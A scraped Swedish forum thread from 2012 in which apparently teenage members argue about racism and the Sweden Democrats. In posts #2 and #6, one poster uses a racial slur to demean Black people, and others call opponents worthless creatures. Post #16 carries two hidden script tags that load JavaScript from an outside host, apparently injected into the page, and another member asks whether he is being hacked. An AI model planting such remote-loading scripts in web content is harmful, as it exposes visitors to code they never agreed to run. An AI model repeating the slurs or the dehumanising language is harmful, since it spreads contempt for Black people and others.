man ska trycka ner sverigerasisterna

1 2 3 4 5 6
puttefnask
P22
Medlem

6 november 2012 15:33 | #1 puttefnask

ni ska sluta vara dumma, elaka rasister. ni har aldrig träffat en neger ändå säger ni att du ska döda alla dem.

ni säger man ska trycka ner andra som är svaga och elaka mot barn. man får inte vara elak, sluta vara fula i munnen och säga dumma saker som ingen förstår.

man blir inte omtyckt av att vara elak och hata andra människor, du trackar andra för du ska känna dig bättre.

därför ska sverigedemokraterna inte få vara med i riksdagen.

haki167
P21
Medlem

6 november 2012 17:18 | #2 haki167

Citat:
Citat av: puttefnask
ni ska sluta vara dumma, elaka rasister. ni har aldrig träffat en neger ändå säger ni att du ska döda alla dem.

ni säger man ska trycka ner andra som är svaga och elaka mot barn. man får inte vara elak, sluta vara fula i munnen och säga dumma saker som ingen förstår.

man blir inte omtyckt av att vara elak och hata andra människor, du trackar andra för du ska känna dig bättre.

Halva mitt liv har negrer satt sig ner på mig så du kan ju ta och köra upp din tråd någonstans och sverigedemokrater har väl sin rätt att uttrycka sig precis som alla andra ? det är ingen skillnad på folk och fä i denna värld. nog du som aldrig har träffat en neger som påstår att vi aldrig har gjort det dessutom vem har sagt någonting om att döda dom alla ? det var bara en riktigt dum anklagelse

kakan1234
P23
Medlem

6 november 2012 17:33 | #3 kakan1234

Citat:
Citat av: puttefnas
Citat:

självklart ska man inte behandla folk olika pga deras hudfärg. du säger att man inte ska trycka ner dom och inte vara elaka vilket är i försej rätt fast ger det en rättigheten att trycka ner sverigedemokrater då? det gör dig precis lika idiotisk som dom som trycker ner dom mörhyade

puttefnask
P22
Medlem

6 november 2012 17:50 | #4 puttefnask

Citat:
Citat av: kakan1234
[quote]Citat av: puttefnas

Citat:

självklart ska man inte behandla folk olika pga deras hudfärg. du säger att man inte ska trycka ner dom och inte vara elaka vilket är i försej rätt fast ger det en rättigheten att trycka ner sverigedemokrater då? det gör dig precis lika idiotisk som dom som trycker ner dom mörhyade
[/quote]

jag blev sur på haki för att han är rasist, du kanske har rätt jag ska inte trycka ner sverige demokrater, men rasister säger att dom vill dödar svarta och invandrare dom får inte det.

om man vill göra något mot mobbare så måste man trycka bort dom så de inser hur dumma de är. annars fattar de inget

som de sen ser när de inte är elaka längre och ändrar sig så får vi vara snälla mot de igen.

arebokert
P26
Medlem

6 november 2012 17:52 | #5 arebokert

Kakan, nej, det är inte samma sak. En Sverigedemokrat tillhör inte någon speciell etnicitet bara för dennes åsikt. Det är stor skillnad på att fälla rasistiska kommentarer och att tycka att någon är en korkskalle på grund utan hans åsikt.

Och till haki, jag gillar din dubbelmoral. Du insisterar profust på att du inte är en rasist i den andra tråden, men du nämner ett flertal gånger ordet "neger" i denna tråd. Du är ju ännu mer patetisk än vad jag någonsin kunde ha förutsett. Mörkhyade människor tillhör exakt samma människoras som du med den ända skillnaden att den mörkhyade personen har ett annat skinnpigment. Jag tycker att denna bild beskriver dagens samhälle ganska bra förövrigt:

puttefnask
P22
Medlem

6 november 2012 17:52 | #6 puttefnask

<div class="quote-content">Citat av: haki167

Citat:

därför ska sverigedemokraterna inte få vara med i riksdagen.</div>

Halva mitt liv har negrer satt sig ner på mig så du kan ju ta och köra upp din tråd någonstans och sverigedemokrater har väl sin rätt att uttrycka sig precis som alla andra ? det är ingen skillnad på folk och fä i denna värld. nog du som aldrig har träffat en neger som påstår att vi aldrig har gjort det dessutom vem har sagt någonting om att döda dom alla ? det var bara en riktigt dum anklagelse

du ljuger och är rasist och sprider hatande mot andra. du har rätt att yttrycka dig, men inte inte rätt att vara elak, hata folk, döda neger eller slå andra

dina föräldrar borde hjälpa dig och jag känner sorg för dig

arebokert
P26
Medlem

6 november 2012 17:58 | #7 arebokert

du ljuger och är rasist och sprider hatande mot andra. du har rätt att yttrycka dig, men inte inte rätt att vara elak, hata folk, döda neger eller slå andra

dina föräldrar borde hjälpa dig och jag känner sorg för dig

Kolla bara på detta. Puttefnask är även han 13 år, och det syns klart och tydligt att han hyser mycket större respekt för sina medmänniskor. Han verkar i helhet vara en väldigt human och eftertänksam person. Du borde ta lärdom av Puttefnask haki, för han är hundra gånger mognare än vad du är.

kakan1234
P23
Medlem

6 november 2012 18:39 | #8 kakan1234

Det jag menar är att mycket av det puttefnask skriver stämmer, det finns tyvär folk som är väldigt orättvisa mot mörhyade men det är inte heller rätt att slänga ut sverigedemokraterna för det.

Jag har dock inte så stor koll på sverigedemokraterna fast jag har svårt att tro att dom bara har racistiska åsikter och att trycka ner dom vore att göra samma sak som vissa gör mot svarta.

Problemet med att börja göra det samma med "mobbarna" är att det anntagligen inte kommer hjälpa nåt. dom kommer bara bli mer och mer hatiska och allt kommer sluta i kaos

Det finns mycket bättre sätt att lösa sånt här på en att trycka ner varandra te.x. fördomar skapas oftas av ovissdom så istället för att börja vara dumma tillbaka så kan man se till att dom fattar att hyn har inget med vem hur man är är eller vad man gör.

arebokert
P26
Medlem

6 november 2012 18:46 | #9 arebokert

Det jag menar är att det puttefnask skriver stämmer, det finns tyvär folk som är väldigt orättvisa mot mörhyade men det är inte heller rätt att slänga ut sverigedemokraterna för det.

Jag har dock inte så stor koll på sverigedemokraterna fast jag har svårt att tro att dom bara har racistiska åsikter och att trycka ner dom vore att göra samma sak som vissa gör mot svarta.

Det finns mycket bättre sätt att lösa sånt här på en att trycka ner varandra te.x. fördomar skapas oftas av ovissdom så istället för att börja vara dumma tillbaka så kan man se till att dom fattar att hyn har inget med vem hur man är är eller vad man gör.

När det gäller rasister så brukar de dock i allmänhet vara ganska tjockskalliga. Jag har aldrig mött en rasist som har erkänt att han haft fel, även fast starka bevis har lagts fram. Men som jag tidigare sagt, naiva människor som inte vet vad SD står för kan jag förlåta och jag hjälper gärna till att bilda dem i vad partier så som SD och Svenskarnas parti står för. Jag har dock ingen sympati för självmedvetna rasister.

Tacoknug
P28
Medlem

6 november 2012 19:35 | #10 Tacoknug

Citat:

Du har kommit väldigt långt i att ha en bra politisk insyn men många av orden du använder är i fel sammanhang t ex elaka rasister, döda och neger. Dock så är det väldigt få rasister som trycker ner svaga och som är elaka mot barn.

arebokert du säger att att alla är lika, att man ska skita i färgen på hyn. Men du använder ordet etnicitet vilket i grund och botten betyder grupp. Men enligt vad du säger så finns det inget man kan kalla "grupp", pågrund av att du säger att alla är lika.

arebokert
P26
Medlem

6 november 2012 19:52 | #11 arebokert

arebokert du säger att att alla är lika, att man ska skita i färgen på hyn. Men du använder ordet etnicitet vilket i grund och botten betyder grupp. Men enligt vad du säger så finns det inget man kan kalla "grupp", pågrund av att du säger att alla är lika.

Jag hoppas att du inser att det är stor skillnad på att skillja på människor beroende på etnicitet och att skillja på människor beroende på ras. Alla människor är exakt likadana uppbyggda med samma organ och liknande. En mörkhyad person har exakt samma hjärnkapacitet som en vit person. Det är detta jag försöker få fram. Sedan så är det ju självklart att alla är olika när det kommer till beteende och personlighet. Saxxat från wikipedia: "Etnicitet, tillhörigheten till viss etnos, betyder tillhörighet till en grupp av människor som själva anser sig ha gemensamt ursprung och egenskaper". Detta betyder alltså att dessa människor inte är andra sorters människor, de delar endast diverse gemensamma saker så som var de kommer ifrån och kultur.
Det går inte att skilja på människor som man gör med hundar. Det många rasister argumenterar för är att någon från mellanöstern uteslutet har ett speciellt beteendemönster, vilket är så mycket skitsnack så man bara vill kräkas. Vare sig du är vit, mörkhyad, asiat eller europé, så har du fortfarande exakt samma sorts hjärnkapacitet och precis samma förutsättningar att forma en helt egen personlighet oberoende av ditt utseende och härkomst.

Det är endast smygrasister som inte uppför sig ohövligt gent emot de som de föraktar, så som mörkhyade. Rasister förtjänar helt enkelt inte någon sympati från något håll, de lever i ett skal av en människa. Jag kan omöjligen uttrycka hur mycket jag genuint hatar rasister. Det Puttefnask säger om rasister är sant och jag hoppas för allt i världen att han behåller dessa värderingar allt efter han växer upp. Du kan argumentera hur mycket du vill för att man inte ska dra alla över en kant beroende på åsikter, men att ha rasistiska/nazistiska åsikter är inte försvarbart på något plan och det är fullkomligt resonabelt att generalisera alla besitter dessa vedervärdiga tankar.

haki167
P21
Medlem

6 november 2012 20:19 | #12 haki167

Citat:
Citat av: arebokert
[color=#ff0000]du ljuger och är rasist och sprider hatande mot andra. du har rätt att yttrycka dig, men inte inte rätt att vara elak, hata folk, döda neger eller slå andra[/color]

[color=#ff0000]dina föräldrar borde hjälpa dig och jag känner sorg för dig[/color]

Kolla bara på detta. Puttefnask är även han 13 år, och det syns klart och tydligt att han hyser mycket större respekt för sina medmänniskor. Han verkar i helhet vara en väldigt human och eftertänksam person. Du borde ta lärdom av Puttefnask haki, för han är hundra gånger mognare än vad du är.

Om han nu är 13 kan han ju länka sin fb. Du kan inte säga att alla som är sd är idiotiska äckliga människor som inte borde få existera du kan inte säga så för det är precis lika idiotiskt som du påstår med rascister för det är exakt likadant hur var det med det att jag inte brukar göra så många inlägg på jesper ? bara för att man vill att människorna inte ska gå och snacka skit sd så blir det strunt saker som kommer upp tack vara dig och sen så kommer herr puttefnask och tror han är något. Jag ville bara att ni skulle visa respekt och nu är det massor med trådar om detta. För tusande gången så är jag ingen rasist eller nazist eller något annat. Min storebror t.ex har en flickvän som är 22 om jag kommer ihåg rätt och hon kommer från sydamerika (colombia) så käften på dig bokert du vet ingenting om mig ! du kan inte sitta och säga att jag är rasist när min brors flickvän är svart

puttefnask
P22
Medlem

6 november 2012 20:33 | #13 puttefnask

Citat:
Citat av: haki167
[quote]Citat av: arebokert

[color=#ff0000]du ljuger och är rasist och sprider hatande mot andra. du har rätt att yttrycka dig, men inte inte rätt att vara elak, hata folk, döda neger eller slå andra[/color]

[color=#ff0000]dina föräldrar borde hjälpa dig och jag känner sorg för dig[/color]

Om han nu är 13 kan han ju länka sin fb. Du kan inte säga att alla som är sd är idiotiska äckliga människor som inte borde få existera du kan inte säga så för det är precis lika idiotiskt som du påstår med rascister för det är exakt likadant hur var det med det att jag inte brukar göra så många inlägg på jesper ? bara för att man vill att människorna inte ska gå och snacka skit sd så blir det strunt saker som kommer upp tack vara dig och sen så kommer herr puttefnask och tror han är något. Jag ville bara att ni skulle visa respekt och nu är det massor med trådar om detta. För tusande gången så är jag ingen rasist eller nazist eller något annat. Min storebror t.ex har en flickvän som är 22 om jag kommer ihåg rätt och hon kommer från sydamerika (colombia) så käften på dig bokert du vet ingenting om mig ! du kan inte sitta och säga att jag är rasist när min brors flickvän är svart
[/quote]

man får inte snacka skit, ingen gör det heller. varför ska man visa respekt mot du som hatar svarta? ger du respekt mot den svarta personer? nej, så du får inte det heller.

du säger att man ska springa runt och visa respekt mot mobbare, och det är fel. hoppas du lär dig något när vi inte aksepterar rasister. var glad och snäll istället och sluta hata mot folk så kommer du få vänner.

arebokert
P26
Medlem

6 november 2012 20:48 | #14 arebokert

Om han nu är 13 kan han ju länka sin fb. Du kan inte säga att alla som är sd är idiotiska äckliga människor som inte borde få existera du kan inte säga så för det är precis lika idiotiskt som du påstår med rascister för det är exakt likadant hur var det med det att jag inte brukar göra så många inlägg på jesper

Jag har fortfarande inte gjort särskilt många inlägg på sistone. Anledningen till att det blev en del nu var att du eggade upp mig. Förövrigt så sa jag inte att alla Sverigedemokrater inte borde på existera. Jag nämnde rasister. Sedan att SD är ett genomruttet rasistiskt parti är en helt annan fråga. Det finns ju säkert många som har blivit vilseledda av SD:s propaganda och dessa människor önskar jag all lycka i världen när de väl förstår vad partiet faktiskt står för, och lämnar det.

bara för att man vill att människorna inte ska gå och snacka skit sd så blir det strunt saker som kommer upp tack vara dig och sen så kommer herr puttefnask och <span style="text-decoration: underline; color: #800000;">tror han är något</span>

Du älskar verkligen den frasen va? Det du gjorde var att dra upp en diskussion om SD. Förvänta dig inte att du kan nämna ett så kontroversiellt parti som SD utan att starta argumentation. Puttefnask har uppenbarligen högre vetskap och känsla för ämnet än vad du har, så kom inte och prata dumheter bara för att han är mer mogen än vad du är.

Jag ville bara att ni skulle visa respekt och nu är det massor med trådar om detta.

Jag kommer aldrig visa respekt eller sympatisera med någon så genomrutten som en rasist. De som håller på SD och som faktiskt förstår vad deras parti står för är rasister och jag kommer då behandla dem som de värdelösa kreatur de är.

För tusande gången så är jag ingen rasist eller nazist eller något annat. Min storebror t.ex har en flickvän som är 22 om jag kommer ihåg rätt och hon kommer från sydamerika (colombia) så käften på dig bokert du vet ingenting om mig ! du kan inte sitta och säga att jag är rasist när min brors flickvän är svart

När du använder ordet "neger" i negativt syfte så motsäger du dig själv helt. Meningen "Halva mitt liv har negrer satt sig ner på mig så du kan ju ta och köra upp din tråd någonstans" är ett praktexemplar på ett rasistiskt uttalande, där ordet "neger", som syftar på mörkhyade, används för att förnedra människor med mörk hudfärg. Du borde läsa på vad "dubbelmoral" är. Du uttrycker nämligen enorm dubbelmoral när du först säger att "negrer" har satt sig ner på dig i hela ditt liv, för att sedan gå vidare och säga att din bror har en flickvän som är svart. Jag säger som jag sa i den andra tråden, kom tillbaka om några år när du lärt dig ett och annat om saker och ting här i världen.

cerio
P31
Medlem

6 november 2012 23:06 | #15 cerio

Kakan, nej, det är inte samma sak. En Sverigedemokrat tillhör inte någon speciell etnicitet bara för dennes åsikt. Det är stor skillnad på att fälla rasistiska kommentarer och att tycka att någon är en korkskalle på grund utan hans åsikt.

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">Och till haki, jag gillar din dubbelmoral. Du insisterar profust på att du inte är en rasist i den andra tråden, men du nämner ett flertal gånger ordet "neger" i denna tråd. Du är ju ännu mer patetisk än vad jag någonsin kunde ha förutsett. Mörkhyade människor tillhör exakt samma människoras som du med den ända skillnaden att den mörkhyade personen har ett annat skinnpigment. Jag tycker att denna bild beskriver dagens samhälle ganska bra förövrigt.

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">Snodde ditt sätt att citera.

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">Jag ville bara påpeka (vara lite petnoga) att det finns faktiskt "raser" i människosläktet. Däremot är det inte vad folk tror. Det är ett sätt att sätta människor i olika kategorier för att göra jobb och samhälle enklare. Faktorer är sådana som, etnicitet, kultur, geografiskt ursprung och så vidare(Där är en jävla massa faktorer).

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">Så varför ska man kategorisera människan? För vi är olika. Vi har betydliga skillnader beroende vart du kan bo och eller kultur etc. Så om man ska hänvisa till någons utseende. Så säger man "Du vet Johan, han mörkhyade killen, han e sjuuukt snygg".

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">Detta används i "proffesionella" världen också, då poliser hänvisar ofta till etnicitet.

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">Men ska man behandlas olika på grund av sin ras? Självklart inte! En ras är inte över den andra. En mörkhyad person som mördar är lika ond och dålig som en vithyad person som mördar.

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">Vi är alla lika värda. Sluta dra alla över samma kant(Brukar man säga va?)

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">Googla human classification eller människo raser. Wikipedia är inte speciellt omtyckt som källa men om jag inte har fel så ska dem ha lite information om det.

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">PS. Förlåt för dåligt formulerat och kanske även stavat. Detta skrev jag väldigt hastigt och är även trött. ds.

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">

<p style="color: #272727; margin: 0px 22px 0px 0px; padding: 5px 15px 10px 0px; width: 528px;">Alltså forumet är ju helt väck nu för tiden...... bara kolla inlägget.

Reeeqz
P23
Medlem

7 november 2012 15:58 | #16 Reeeqz

Alla har sina egna åsikter

Bara att leva med det

Nuff Said

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

puttefnask
P22
Medlem

7 november 2012 16:12 | #17 puttefnask

nej alla får inte ha elaka åsikter eller döda någon, så du gillar rasister eller?

och varför har du javaskript med i alla inläggen? försöker du hakka mig?

Reeeqz
P23
Medlem

7 november 2012 16:27 | #18 Reeeqz

Jag är inte rasist . Alla får ha egna åsikter i sverige.

Finns inte direkt något du kan göra

puttefnask
P22
Medlem

7 november 2012 16:52 | #19 puttefnask

man kan ha åsikter, men bara om man inte är elak och slår andra utan anledning.

jo man ska trycker ner mobbare och rasister som för annars trycker de ner dig först, och sen när de är snälla igen kan man vara snäll tillbaka

kakan1234
P23
Medlem

7 november 2012 16:52 | #20 kakan1234

<div class="quote-content">Citat av: puttefnask

nej alla får inte ha elaka åsikter eller döda någon, så du gillar rasister eller?

och varför har du javaskript med i alla inläggen? försöker du hakka mig?</div>

fel, alla har faktist rätt till att ha en åsikter enligt dom svenska rättigheterna

<div class="quote-content" style="width: 975.0499877929688px;">Citat av: puttefnask

man kan ha åsikter, men bara om man inte är elak och slår andra utan anledning.

jo man ska trycker ner mobbare och rasister som för annars trycker de ner dig först, och sen när de är snälla igen kan man vara snäll tillbaka</div>

den finns MÅNGA bättre sätt att få stopp på sånt istället för att börja trycka ner varandra vilket är nog bland det sämsta även om det dom flesta rasisterna gör är helt fel.

1 2 3 4 5 6

Skriva inlägg?

Logga in för att svara i tråden.